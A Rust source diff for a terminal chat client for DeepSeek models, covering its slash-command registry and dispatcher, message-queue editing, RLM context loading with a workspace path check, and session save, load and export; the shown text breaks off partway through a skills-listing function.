||||
message: None,
|
||||
action: Some(action),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a result with both message and action
|
||||
#[allow(dead_code)]
|
||||
pub fn with_message_and_action(msg: impl Into<String>, action: AppAction) -> Self {
|
||||
Self {
|
||||
message: Some(msg.into()),
|
||||
action: Some(action),
|
||||
}
|
||||
}
|
||||
|
||||
/// Create an error message result
|
||||
pub fn error(msg: impl Into<String>) -> Self {
|
||||
Self {
|
||||
message: Some(format!("Error: {}", msg.into())),
|
||||
action: None,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Command metadata for help and autocomplete
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub struct CommandInfo {
|
||||
pub name: &'static str,
|
||||
pub aliases: &'static [&'static str],
|
||||
pub description: &'static str,
|
||||
pub usage: &'static str,
|
||||
}
|
||||
|
||||
/// All registered commands
|
||||
pub const COMMANDS: &[CommandInfo] = &[
|
||||
// Core commands
|
||||
CommandInfo {
|
||||
name: "help",
|
||||
aliases: &["?"],
|
||||
description: "Show help information",
|
||||
usage: "/help [command]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "clear",
|
||||
aliases: &[],
|
||||
description: "Clear conversation history",
|
||||
usage: "/clear",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "exit",
|
||||
aliases: &["quit", "q"],
|
||||
description: "Exit the application",
|
||||
usage: "/exit",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "model",
|
||||
aliases: &[],
|
||||
description: "Switch or view current model",
|
||||
usage: "/model [name]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "queue",
|
||||
aliases: &["queued"],
|
||||
description: "View or edit queued messages",
|
||||
usage: "/queue [list|edit <n>|drop <n>|clear]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "subagents",
|
||||
aliases: &["agents"],
|
||||
description: "List sub-agent status",
|
||||
usage: "/subagents",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "deepseek",
|
||||
aliases: &["dashboard", "api"],
|
||||
description: "Show DeepSeek dashboard and docs links",
|
||||
usage: "/deepseek",
|
||||
},
|
||||
// Session commands
|
||||
CommandInfo {
|
||||
name: "save",
|
||||
aliases: &[],
|
||||
description: "Save session to file",
|
||||
usage: "/save [path]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "load",
|
||||
aliases: &[],
|
||||
description: "Load session from file (or RLM context in RLM mode)",
|
||||
usage: "/load [path]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "rlm",
|
||||
aliases: &[],
|
||||
description: "Enter RLM (Aleph) mode and show quickstart",
|
||||
usage: "/rlm",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "aleph",
|
||||
aliases: &[],
|
||||
description: "Alias for /rlm (external memory quickstart)",
|
||||
usage: "/aleph",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "save-session",
|
||||
aliases: &["save_session"],
|
||||
description: "Save RLM session to file",
|
||||
usage: "/save-session [path]",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "status",
|
||||
aliases: &[],
|
||||
description: "Show RLM context status",
|
||||
usage: "/status",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "repl",
|
||||
aliases: &[],
|
||||
description: "Toggle RLM REPL mode",
|
||||
usage: "/repl",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "compact",
|
||||
aliases: &[],
|
||||
description: "Toggle auto-compaction",
|
||||
usage: "/compact",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "export",
|
||||
aliases: &[],
|
||||
description: "Export conversation to markdown",
|
||||
usage: "/export [path]",
|
||||
},
|
||||
// Config commands
|
||||
CommandInfo {
|
||||
name: "config",
|
||||
aliases: &[],
|
||||
description: "Display current configuration",
|
||||
usage: "/config",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "set",
|
||||
aliases: &[],
|
||||
description: "Modify a setting",
|
||||
usage: "/set <key> <value>",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "yolo",
|
||||
aliases: &[],
|
||||
description: "Enable YOLO mode (shell + trust + auto-approve)",
|
||||
usage: "/yolo",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "trust",
|
||||
aliases: &[],
|
||||
description: "Enable trust mode (access files outside workspace)",
|
||||
usage: "/trust",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "logout",
|
||||
aliases: &[],
|
||||
description: "Clear API key and return to setup",
|
||||
usage: "/logout",
|
||||
},
|
||||
// Debug commands
|
||||
CommandInfo {
|
||||
name: "tokens",
|
||||
aliases: &[],
|
||||
description: "Show token usage for session",
|
||||
usage: "/tokens",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "system",
|
||||
aliases: &[],
|
||||
description: "Show current system prompt",
|
||||
usage: "/system",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "context",
|
||||
aliases: &[],
|
||||
description: "Show context window usage",
|
||||
usage: "/context",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "undo",
|
||||
aliases: &[],
|
||||
description: "Remove last message pair",
|
||||
usage: "/undo",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "retry",
|
||||
aliases: &[],
|
||||
description: "Retry the last request",
|
||||
usage: "/retry",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "init",
|
||||
aliases: &[],
|
||||
description: "Generate AGENTS.md for project",
|
||||
usage: "/init",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "settings",
|
||||
aliases: &[],
|
||||
description: "Show persistent settings",
|
||||
usage: "/settings",
|
||||
},
|
||||
// Skills commands
|
||||
CommandInfo {
|
||||
name: "skills",
|
||||
aliases: &[],
|
||||
description: "List available skills",
|
||||
usage: "/skills",
|
||||
},
|
||||
CommandInfo {
|
||||
name: "skill",
|
||||
aliases: &[],
|
||||
description: "Activate a skill for next message",
|
||||
usage: "/skill <name>",
|
||||
},
|
||||
// Debug/cost command
|
||||
CommandInfo {
|
||||
name: "cost",
|
||||
aliases: &[],
|
||||
description: "Show session cost breakdown",
|
||||
usage: "/cost",
|
||||
},
|
||||
];
|
||||
|
||||
/// Execute a slash command
|
||||
pub fn execute(cmd: &str, app: &mut App) -> CommandResult {
|
||||
let parts: Vec<&str> = cmd.trim().splitn(2, ' ').collect();
|
||||
let command = parts[0].to_lowercase();
|
||||
let command = command.strip_prefix('/').unwrap_or(&command);
|
||||
let arg = parts.get(1).map(|s| s.trim());
|
||||
|
||||
// Match command or alias
|
||||
match command {
|
||||
// Core commands
|
||||
"help" | "?" => core::help(app, arg),
|
||||
"clear" => core::clear(app),
|
||||
"exit" | "quit" | "q" => core::exit(),
|
||||
"model" => core::model(app, arg),
|
||||
"queue" | "queued" => queue::queue(app, arg),
|
||||
"subagents" | "agents" => core::subagents(app),
|
||||
"deepseek" | "dashboard" | "api" => core::deepseek_links(),
|
||||
|
||||
// Session commands
|
||||
"save" => session::save(app, arg),
|
||||
"load" => {
|
||||
if app.mode == AppMode::Rlm {
|
||||
rlm::load(app, arg)
|
||||
} else {
|
||||
session::load(app, arg)
|
||||
}
|
||||
}
|
||||
"rlm" | "aleph" => rlm::enter(app),
|
||||
"save-session" | "save_session" => rlm::save_session(app, arg),
|
||||
"status" => rlm::status(app),
|
||||
"repl" => rlm::repl(app),
|
||||
"compact" => session::compact(app),
|
||||
"export" => session::export(app, arg),
|
||||
|
||||
// Config commands
|
||||
"config" => config::show_config(app),
|
||||
"settings" => config::show_settings(app),
|
||||
"set" => config::set_config(app, arg),
|
||||
"yolo" => config::yolo(app),
|
||||
"trust" => config::trust(app),
|
||||
"logout" => config::logout(app),
|
||||
|
||||
// Debug commands
|
||||
"tokens" => debug::tokens(app),
|
||||
"cost" => debug::cost(app),
|
||||
"system" => debug::system_prompt(app),
|
||||
"context" => debug::context(app),
|
||||
"undo" => debug::undo(app),
|
||||
"retry" => debug::retry(app),
|
||||
|
||||
// Project commands
|
||||
"init" => init::init(app),
|
||||
|
||||
// Skills commands
|
||||
"skills" => skills::list_skills(app),
|
||||
"skill" => skills::run_skill(app, arg),
|
||||
|
||||
_ => CommandResult::error(format!(
|
||||
"Unknown command: /{command}. Type /help for available commands."
|
||||
)),
|
||||
}
|
||||
}
|
||||
|
||||
/// Get command info by name or alias
|
||||
pub fn get_command_info(name: &str) -> Option<&'static CommandInfo> {
|
||||
let name = name.strip_prefix('/').unwrap_or(name);
|
||||
COMMANDS
|
||||
.iter()
|
||||
.find(|cmd| cmd.name == name || cmd.aliases.contains(&name))
|
||||
}
|
||||
|
||||
/// Get all commands matching a prefix (for autocomplete)
|
||||
#[allow(dead_code)]
|
||||
pub fn commands_matching(prefix: &str) -> Vec<&'static CommandInfo> {
|
||||
let prefix = prefix.strip_prefix('/').unwrap_or(prefix).to_lowercase();
|
||||
COMMANDS
|
||||
.iter()
|
||||
.filter(|cmd| {
|
||||
cmd.name.starts_with(&prefix) || cmd.aliases.iter().any(|a| a.starts_with(&prefix))
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
@@ -0,0 +1,129 @@
|
||||
//! Queue commands: queue list/edit/drop/clear
|
||||
|
||||
use crate::tui::app::App;
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
const PREVIEW_LIMIT: usize = 120;
|
||||
|
||||
pub fn queue(app: &mut App, args: Option<&str>) -> CommandResult {
|
||||
let arg = args.unwrap_or("").trim();
|
||||
if arg.is_empty() || arg.eq_ignore_ascii_case("list") {
|
||||
return list_queue(app);
|
||||
}
|
||||
|
||||
let mut parts = arg.split_whitespace();
|
||||
let action = parts.next().unwrap_or("").to_lowercase();
|
||||
|
||||
match action.as_str() {
|
||||
"edit" => edit_queue(app, parts.next()),
|
||||
"drop" | "remove" | "rm" => drop_queue(app, parts.next()),
|
||||
"clear" => clear_queue(app),
|
||||
_ => CommandResult::error("Usage: /queue [list|edit <n>|drop <n>|clear]"),
|
||||
}
|
||||
}
|
||||
|
||||
fn list_queue(app: &mut App) -> CommandResult {
|
||||
let mut lines = Vec::new();
|
||||
let queued = app.queued_message_count();
|
||||
|
||||
if let Some(draft) = app.queued_draft.as_ref() {
|
||||
lines.push("Editing queued message:".to_string());
|
||||
lines.push(format!("- {}", truncate_preview(&draft.display)));
|
||||
}
|
||||
|
||||
if queued == 0 {
|
||||
if lines.is_empty() {
|
||||
return CommandResult::message("No queued messages");
|
||||
}
|
||||
return CommandResult::message(lines.join("\n"));
|
||||
}
|
||||
|
||||
lines.push(format!("Queued messages ({queued}):"));
|
||||
for (idx, message) in app.queued_messages.iter().enumerate() {
|
||||
lines.push(format!(
|
||||
"{}. {}",
|
||||
idx + 1,
|
||||
truncate_preview(&message.display)
|
||||
));
|
||||
}
|
||||
|
||||
lines.push("Tip: /queue edit <n> to edit, /queue drop <n> to remove".to_string());
|
||||
|
||||
CommandResult::message(lines.join("\n"))
|
||||
}
|
||||
|
||||
fn edit_queue(app: &mut App, index: Option<&str>) -> CommandResult {
|
||||
if app.queued_draft.is_some() {
|
||||
return CommandResult::error(
|
||||
"Already editing a queued message. Send it or /queue clear to discard.",
|
||||
);
|
||||
}
|
||||
let index = match parse_index(index) {
|
||||
Ok(index) => index,
|
||||
Err(err) => return CommandResult::error(err),
|
||||
};
|
||||
|
||||
let Some(message) = app.remove_queued_message(index) else {
|
||||
return CommandResult::error("Queued message not found");
|
||||
};
|
||||
|
||||
app.input = message.display.clone();
|
||||
app.cursor_position = app.input.len();
|
||||
app.queued_draft = Some(message);
|
||||
app.status_message = Some(format!("Editing queued message {}", index + 1));
|
||||
|
||||
CommandResult::message(format!(
|
||||
"Editing queued message {} (press Enter to re-queue/send)",
|
||||
index + 1
|
||||
))
|
||||
}
|
||||
|
||||
fn drop_queue(app: &mut App, index: Option<&str>) -> CommandResult {
|
||||
let index = match parse_index(index) {
|
||||
Ok(index) => index,
|
||||
Err(err) => return CommandResult::error(err),
|
||||
};
|
||||
|
||||
if app.remove_queued_message(index).is_none() {
|
||||
return CommandResult::error("Queued message not found");
|
||||
}
|
||||
|
||||
CommandResult::message(format!("Dropped queued message {}", index + 1))
|
||||
}
|
||||
|
||||
fn clear_queue(app: &mut App) -> CommandResult {
|
||||
let queued = app.queued_message_count();
|
||||
let had_draft = app.queued_draft.take().is_some();
|
||||
app.queued_messages.clear();
|
||||
if queued == 0 && !had_draft {
|
||||
return CommandResult::message("Queue already empty");
|
||||
}
|
||||
|
||||
CommandResult::message("Queue cleared")
|
||||
}
|
||||
|
||||
fn parse_index(input: Option<&str>) -> Result<usize, &'static str> {
|
||||
let Some(input) = input else {
|
||||
return Err("Missing index. Usage: /queue edit <n> or /queue drop <n>");
|
||||
};
|
||||
let raw = input
|
||||
.parse::<usize>()
|
||||
.map_err(|_| "Index must be a positive number")?;
|
||||
if raw == 0 {
|
||||
return Err("Index must be >= 1");
|
||||
}
|
||||
Ok(raw - 1)
|
||||
}
|
||||
|
||||
fn truncate_preview(text: &str) -> String {
|
||||
if text.chars().count() <= PREVIEW_LIMIT {
|
||||
return text.to_string();
|
||||
}
|
||||
let mut out = String::new();
|
||||
for ch in text.chars().take(PREVIEW_LIMIT.saturating_sub(3)) {
|
||||
out.push(ch);
|
||||
}
|
||||
out.push_str("...");
|
||||
out
|
||||
}
|
||||
@@ -0,0 +1,253 @@
|
||||
//! RLM commands for the TUI (load/status/repl/save-session).
|
||||
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
use crate::rlm::{context_id_from_path, unique_context_id};
|
||||
use crate::tui::app::{App, AppMode};
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
const DEFAULT_CHUNK_SIZE: usize = 2000;
|
||||
const DEFAULT_CHUNK_OVERLAP: usize = 200;
|
||||
|
||||
pub fn welcome_message() -> String {
|
||||
[
|
||||
"DeepSeek RLM / Aleph Sandbox",
|
||||
"Commands: /rlm, /aleph, /load <file>, /repl, /status, /save-session",
|
||||
"Press Tab to exit RLM mode",
|
||||
"Use /repl to toggle expression mode (chat is the default)",
|
||||
"Tip: /load @path forces workspace-relative paths (e.g. @docs/rlm-paper.txt)",
|
||||
"",
|
||||
"Expressions:",
|
||||
" len(ctx)",
|
||||
" search(\"pattern\")",
|
||||
" lines(1, 20)",
|
||||
" chunk(2000, 200)",
|
||||
" chunk_sections(20000)",
|
||||
" chunk_auto(20000)",
|
||||
" vars(), get(\"name\"), set(\"name\", \"value\")",
|
||||
"",
|
||||
"Tip: rlm_query auto_chunks runs the same question over chunk_auto slices.",
|
||||
"Tip: /save-session <path> persists the current RLM session.",
|
||||
]
|
||||
.join("\n")
|
||||
}
|
||||
|
||||
pub fn overview_message() -> String {
|
||||
[
|
||||
"RLM / Aleph Quickstart",
|
||||
"Use /rlm or /aleph to enter external-memory mode.",
|
||||
"Use /load @path to load a file into the RLM context store.",
|
||||
"Use /status to list contexts and usage totals.",
|
||||
"Use /repl to toggle expression mode (chat is default).",
|
||||
"Tip: rlm_query auto_chunks runs the same question over chunk_auto slices.",
|
||||
]
|
||||
.join("\n")
|
||||
}
|
||||
|
||||
pub fn enter(app: &mut App) -> CommandResult {
|
||||
if app.mode != AppMode::Rlm {
|
||||
app.set_mode(AppMode::Rlm);
|
||||
}
|
||||
app.rlm_repl_active = false;
|
||||
CommandResult::message(overview_message())
|
||||
}
|
||||
|
||||
pub fn repl(app: &mut App) -> CommandResult {
|
||||
if app.mode != AppMode::Rlm {
|
||||
app.set_mode(AppMode::Rlm);
|
||||
}
|
||||
if app.rlm_repl_active {
|
||||
app.rlm_repl_active = false;
|
||||
return CommandResult::message("Exited RLM REPL mode. Chat is active.");
|
||||
}
|
||||
app.rlm_repl_active = true;
|
||||
CommandResult::message(welcome_message())
|
||||
}
|
||||
|
||||
pub fn status(app: &mut App) -> CommandResult {
|
||||
let session = match app.rlm_session.lock() {
|
||||
Ok(session) => session,
|
||||
Err(_) => return CommandResult::error("Failed to access RLM session"),
|
||||
};
|
||||
|
||||
if session.contexts.is_empty() {
|
||||
return CommandResult::message("No RLM contexts loaded. Use /load <path>.");
|
||||
}
|
||||
|
||||
let mut lines = Vec::new();
|
||||
lines.push("RLM Session".to_string());
|
||||
lines.push(format!("Active context: {}", session.active_context));
|
||||
lines.push(format!("Loaded contexts: {}", session.contexts.len()));
|
||||
lines.push(format!(
|
||||
"Queries: {} | Input tokens: {} | Output tokens: {}",
|
||||
session.usage.queries, session.usage.input_tokens, session.usage.output_tokens
|
||||
));
|
||||
|
||||
let mut ids: Vec<_> = session.contexts.keys().collect();
|
||||
ids.sort();
|
||||
for id in ids {
|
||||
if let Some(ctx) = session.contexts.get(id) {
|
||||
let source = ctx
|
||||
.source_path
|
||||
.as_ref()
|
||||
.map(|s| format!(" (source: {s})"))
|
||||
.unwrap_or_default();
|
||||
let chunk_count = ctx.chunk(DEFAULT_CHUNK_SIZE, DEFAULT_CHUNK_OVERLAP).len();
|
||||
let section_count = ctx.chunk_sections(20_000).len();
|
||||
lines.push(format!(
|
||||
"- {id}: {} lines, {} chars, {} chunks, {} sections{source}",
|
||||
ctx.line_count, ctx.char_count, chunk_count, section_count
|
||||
));
|
||||
if !ctx.variables.is_empty() {
|
||||
lines.push(format!(" variables: {}", ctx.variables.len()));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
CommandResult::message(lines.join("\n"))
|
||||
}
|
||||
|
||||
pub fn load(app: &mut App, path: Option<&str>) -> CommandResult {
|
||||
let Some(raw) = path else {
|
||||
return CommandResult::error("Usage: /load <path>");
|
||||
};
|
||||
|
||||
let resolved = match resolve_path(app, raw) {
|
||||
Ok(path) => path,
|
||||
Err(err) => return CommandResult::error(err),
|
||||
};
|
||||
|
||||
let mut session = match app.rlm_session.lock() {
|
||||
Ok(session) => session,
|
||||
Err(_) => return CommandResult::error("Failed to access RLM session"),
|
||||
};
|
||||
|
||||
let base_id = context_id_from_path(&resolved);
|
||||
let id = unique_context_id(&session, &base_id);
|
||||
let (line_count, char_count) = match session.load_file(&id, &resolved) {
|
||||
Ok(stats) => stats,
|
||||
Err(err) => {
|
||||
return CommandResult::error(format!("Failed to load {}: {err}", resolved.display()));
|
||||
}
|
||||
};
|
||||
|
||||
CommandResult::message(format!(
|
||||
"Loaded {} ({} lines, {} chars)",
|
||||
resolved.display(),
|
||||
line_count,
|
||||
char_count
|
||||
))
|
||||
}
|
||||
|
||||
pub fn save_session(app: &mut App, path: Option<&str>) -> CommandResult {
|
||||
let save_path = if let Some(p) = path {
|
||||
PathBuf::from(p)
|
||||
} else {
|
||||
let timestamp = chrono::Local::now().format("%Y%m%d_%H%M%S");
|
||||
PathBuf::from(format!("rlm_session_{timestamp}.json"))
|
||||
};
|
||||
|
||||
let parent_dir = save_path
|
||||
.parent()
|
||||
.filter(|p| !p.as_os_str().is_empty())
|
||||
.map(std::path::Path::to_path_buf);
|
||||
if let Some(dir) = parent_dir
|
||||
&& let Err(err) = fs::create_dir_all(&dir)
|
||||
{
|
||||
return CommandResult::error(format!(
|
||||
"Failed to create directory {}: {err}",
|
||||
dir.display()
|
||||
));
|
||||
}
|
||||
|
||||
let session = match app.rlm_session.lock() {
|
||||
Ok(session) => session,
|
||||
Err(_) => return CommandResult::error("Failed to access RLM session"),
|
||||
};
|
||||
let json = match serde_json::to_string_pretty(&*session) {
|
||||
Ok(json) => json,
|
||||
Err(err) => return CommandResult::error(format!("Failed to serialize session: {err}")),
|
||||
};
|
||||
|
||||
match fs::write(&save_path, json) {
|
||||
Ok(()) => CommandResult::message(format!("RLM session saved to {}", save_path.display())),
|
||||
Err(err) => CommandResult::error(format!("Failed to save session: {err}")),
|
||||
}
|
||||
}
|
||||
|
||||
fn resolve_path(app: &App, raw: &str) -> Result<PathBuf, String> {
|
||||
let raw = raw.trim();
|
||||
let (raw, force_workspace) = if let Some(stripped) = raw.strip_prefix('@') {
|
||||
(stripped.trim(), true)
|
||||
} else {
|
||||
(raw, false)
|
||||
};
|
||||
if raw.is_empty() {
|
||||
return Err("Usage: /load <path> (use @ for workspace-relative paths)".to_string());
|
||||
}
|
||||
|
||||
let candidate = if force_workspace {
|
||||
app.workspace.join(raw.trim_start_matches(['/', '\\']))
|
||||
} else if Path::new(raw).is_absolute() {
|
||||
PathBuf::from(raw)
|
||||
} else {
|
||||
app.workspace.join(raw)
|
||||
};
|
||||
let canonical = candidate.canonicalize().map_err(|err| {
|
||||
let mut message = format!("Failed to resolve path {}: {err}", candidate.display());
|
||||
if !force_workspace {
|
||||
message.push_str("\nTip: use /load @path to resolve relative to the workspace.");
|
||||
}
|
||||
message
|
||||
})?;
|
||||
let workspace_root = app
|
||||
.workspace
|
||||
.canonicalize()
|
||||
.unwrap_or_else(|_| app.workspace.clone());
|
||||
if !app.trust_mode && !canonical.starts_with(&workspace_root) {
|
||||
return Err("Path is outside workspace. Use /trust to allow access.".to_string());
|
||||
}
|
||||
Ok(canonical)
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::config::Config;
|
||||
use crate::tui::app::{App, TuiOptions};
|
||||
use std::fs;
|
||||
|
||||
fn make_app(workspace: PathBuf) -> App {
|
||||
let options = TuiOptions {
|
||||
model: "test-model".to_string(),
|
||||
workspace,
|
||||
allow_shell: false,
|
||||
use_alt_screen: true,
|
||||
max_subagents: 1,
|
||||
skills_dir: PathBuf::from("."),
|
||||
memory_path: PathBuf::from("memory.md"),
|
||||
notes_path: PathBuf::from("notes.txt"),
|
||||
mcp_config_path: PathBuf::from("mcp.json"),
|
||||
use_memory: false,
|
||||
start_in_agent_mode: false,
|
||||
yolo: false,
|
||||
resume_session_id: None,
|
||||
};
|
||||
App::new(options, &Config::default())
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn resolve_path_with_at_prefix_uses_workspace_root() {
|
||||
let tmp = tempfile::tempdir().expect("tempdir");
|
||||
let docs_dir = tmp.path().join("docs");
|
||||
fs::create_dir_all(&docs_dir).expect("create docs dir");
|
||||
let file_path = docs_dir.join("rlm-paper.txt");
|
||||
fs::write(&file_path, "hello").expect("write file");
|
||||
|
||||
let app = make_app(tmp.path().to_path_buf());
|
||||
let resolved = resolve_path(&app, "@/docs/rlm-paper.txt").expect("resolve path with @");
|
||||
assert_eq!(resolved, file_path.canonicalize().expect("canonicalize"));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,181 @@
|
||||
//! Session commands: save, load, compact, export
|
||||
|
||||
use std::fmt::Write;
|
||||
use std::path::PathBuf;
|
||||
|
||||
use crate::compaction::CompactionConfig;
|
||||
use crate::session_manager::create_saved_session;
|
||||
use crate::tui::app::{App, AppAction};
|
||||
use crate::tui::history::{HistoryCell, history_cells_from_message};
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
/// Save session to file
|
||||
pub fn save(app: &mut App, path: Option<&str>) -> CommandResult {
|
||||
let save_path = if let Some(p) = path {
|
||||
PathBuf::from(p)
|
||||
} else {
|
||||
let timestamp = chrono::Local::now().format("%Y%m%d_%H%M%S");
|
||||
PathBuf::from(format!("session_{timestamp}.json"))
|
||||
};
|
||||
|
||||
let messages = app.api_messages.clone();
|
||||
let session = create_saved_session(
|
||||
&messages,
|
||||
&app.model,
|
||||
&app.workspace,
|
||||
u64::from(app.total_tokens),
|
||||
app.system_prompt.as_ref(),
|
||||
);
|
||||
|
||||
let sessions_dir = save_path
|
||||
.parent()
|
||||
.filter(|p| !p.as_os_str().is_empty())
|
||||
.map_or_else(|| app.workspace.clone(), std::path::Path::to_path_buf);
|
||||
|
||||
match std::fs::create_dir_all(&sessions_dir) {
|
||||
Ok(()) => {
|
||||
match std::fs::write(&save_path, serde_json::to_string_pretty(&session).unwrap()) {
|
||||
Ok(()) => {
|
||||
app.current_session_id = Some(session.metadata.id.clone());
|
||||
CommandResult::message(format!(
|
||||
"Session saved to {} (ID: {})",
|
||||
save_path.display(),
|
||||
&session.metadata.id[..8]
|
||||
))
|
||||
}
|
||||
Err(e) => CommandResult::error(format!("Failed to save session: {e}")),
|
||||
}
|
||||
}
|
||||
Err(e) => CommandResult::error(format!("Failed to create directory: {e}")),
|
||||
}
|
||||
}
|
||||
|
||||
/// Load session from file
|
||||
pub fn load(app: &mut App, path: Option<&str>) -> CommandResult {
|
||||
let load_path = if let Some(p) = path {
|
||||
if p.contains('/') || p.contains('\\') {
|
||||
PathBuf::from(p)
|
||||
} else {
|
||||
app.workspace.join(p)
|
||||
}
|
||||
} else {
|
||||
return CommandResult::error("Usage: /load <path>");
|
||||
};
|
||||
|
||||
let content = match std::fs::read_to_string(&load_path) {
|
||||
Ok(c) => c,
|
||||
Err(e) => {
|
||||
return CommandResult::error(format!("Failed to read session file: {e}"));
|
||||
}
|
||||
};
|
||||
|
||||
let session: crate::session_manager::SavedSession = match serde_json::from_str(&content) {
|
||||
Ok(s) => s,
|
||||
Err(e) => {
|
||||
return CommandResult::error(format!("Failed to parse session file: {e}"));
|
||||
}
|
||||
};
|
||||
|
||||
app.api_messages.clone_from(&session.messages);
|
||||
app.history.clear();
|
||||
for msg in &app.api_messages {
|
||||
app.history.extend(history_cells_from_message(msg));
|
||||
}
|
||||
app.mark_history_updated();
|
||||
app.transcript_selection.clear();
|
||||
app.model.clone_from(&session.metadata.model);
|
||||
app.workspace.clone_from(&session.metadata.workspace);
|
||||
app.total_tokens = u32::try_from(session.metadata.total_tokens).unwrap_or(u32::MAX);
|
||||
app.total_conversation_tokens = app.total_tokens;
|
||||
app.current_session_id = Some(session.metadata.id.clone());
|
||||
if let Some(sp) = session.system_prompt {
|
||||
app.system_prompt = Some(crate::models::SystemPrompt::Text(sp));
|
||||
}
|
||||
app.scroll_to_bottom();
|
||||
|
||||
CommandResult::with_message_and_action(
|
||||
format!(
|
||||
"Session loaded from {} (ID: {}, {} messages)",
|
||||
load_path.display(),
|
||||
&session.metadata.id[..8],
|
||||
session.metadata.message_count
|
||||
),
|
||||
crate::tui::app::AppAction::SyncSession {
|
||||
messages: app.api_messages.clone(),
|
||||
system_prompt: app.system_prompt.clone(),
|
||||
model: app.model.clone(),
|
||||
workspace: app.workspace.clone(),
|
||||
},
|
||||
)
|
||||
}
|
||||
|
||||
/// Toggle auto-compaction
|
||||
pub fn compact(app: &mut App) -> CommandResult {
|
||||
app.auto_compact = !app.auto_compact;
|
||||
let mut compaction = CompactionConfig::default();
|
||||
compaction.enabled = app.auto_compact;
|
||||
compaction.token_threshold = app.compact_threshold;
|
||||
compaction.model = app.model.clone();
|
||||
|
||||
CommandResult::with_message_and_action(
|
||||
format!(
|
||||
"Auto-compact: {}",
|
||||
if app.auto_compact { "ON" } else { "OFF" }
|
||||
),
|
||||
AppAction::UpdateCompaction(compaction),
|
||||
)
|
||||
}
|
||||
|
||||
/// Export conversation to markdown
|
||||
pub fn export(app: &mut App, path: Option<&str>) -> CommandResult {
|
||||
let export_path = path.map_or_else(
|
||||
|| {
|
||||
let timestamp = chrono::Local::now().format("%Y%m%d_%H%M%S");
|
||||
PathBuf::from(format!("chat_export_{timestamp}.md"))
|
||||
},
|
||||
PathBuf::from,
|
||||
);
|
||||
|
||||
let mut content = String::new();
|
||||
content.push_str("# Chat Export\n\n");
|
||||
let _ = write!(
|
||||
content,
|
||||
"**Model:** {}\n**Workspace:** {}\n**Date:** {}\n\n---\n\n",
|
||||
app.model,
|
||||
app.workspace.display(),
|
||||
chrono::Local::now().format("%Y-%m-%d %H:%M:%S")
|
||||
);
|
||||
|
||||
for cell in &app.history {
|
||||
let (role, body) = match cell {
|
||||
HistoryCell::User { content } => ("**You:**", content.clone()),
|
||||
HistoryCell::Assistant { content, .. } => ("**Assistant:**", content.clone()),
|
||||
HistoryCell::System { content } => ("*System:*", content.clone()),
|
||||
HistoryCell::ThinkingSummary { summary } => ("*Thinking:*", summary.clone()),
|
||||
HistoryCell::Tool(tool) => ("**Tool:**", render_tool_cell(tool, 80)),
|
||||
};
|
||||
|
||||
let _ = write!(content, "{}\n\n{}\n\n---\n\n", role, body.trim());
|
||||
}
|
||||
|
||||
match std::fs::write(&export_path, content) {
|
||||
Ok(()) => CommandResult::message(format!("Exported to {}", export_path.display())),
|
||||
Err(e) => CommandResult::error(format!("Failed to export: {e}")),
|
||||
}
|
||||
}
|
||||
|
||||
fn render_tool_cell(tool: &crate::tui::history::ToolCell, width: u16) -> String {
|
||||
tool.lines(width)
|
||||
.into_iter()
|
||||
.map(line_to_string)
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n")
|
||||
}
|
||||
|
||||
fn line_to_string(line: ratatui::text::Line<'static>) -> String {
|
||||
line.spans
|
||||
.into_iter()
|
||||
.map(|span| span.content.to_string())
|
||||
.collect::<String>()
|
||||
}
|
||||
@@ -0,0 +1,92 @@
|
||||
//! Skills commands: skills, skill
|
||||
|
||||
use std::fmt::Write;
|
||||
|
||||
use crate::skills::SkillRegistry;
|
||||
use crate::tui::app::App;
|
||||
use crate::tui::history::HistoryCell;
|
||||
|
||||
use super::CommandResult;
|
||||
|
||||
/// List all available skills
|
||||
pub fn list_skills(app: &mut App) -> CommandResult {
|
||||
let skills_dir = app.skills_dir.clone();
|
||||
let registry = SkillRegistry::discover(&skills_dir);
|
||||
|
||||
if registry.is_empty() {
|
||||
let msg = format!(
|
||||
"No skills found.\n\n\
|
||||
Skills location: {}\n\n\
|
||||
To add skills, create directories with SKILL.md files:\n \
|
||||
{}/my-skill/SKILL.md\n\n\
|
||||
Format:\n \
|
||||
---\n \
|
||||
name: my-skill\n \
|
||||
description: What this skill does\n \
|
||||
allowed-tools: read_file, list_dir\n \
|
||||
---\n\n \
|
||||
<instructions here>",
|
||||
skills_dir.display(),
|
||||
skills_dir.display()
|
||||
);
|
||||
return CommandResult::message(msg);
|
||||
}
|
||||
|
||||
let mut output = format!("Available skills ({}):\n", registry.len());
|
||||
output.push_str("─────────────────────────────\n");
|
||||
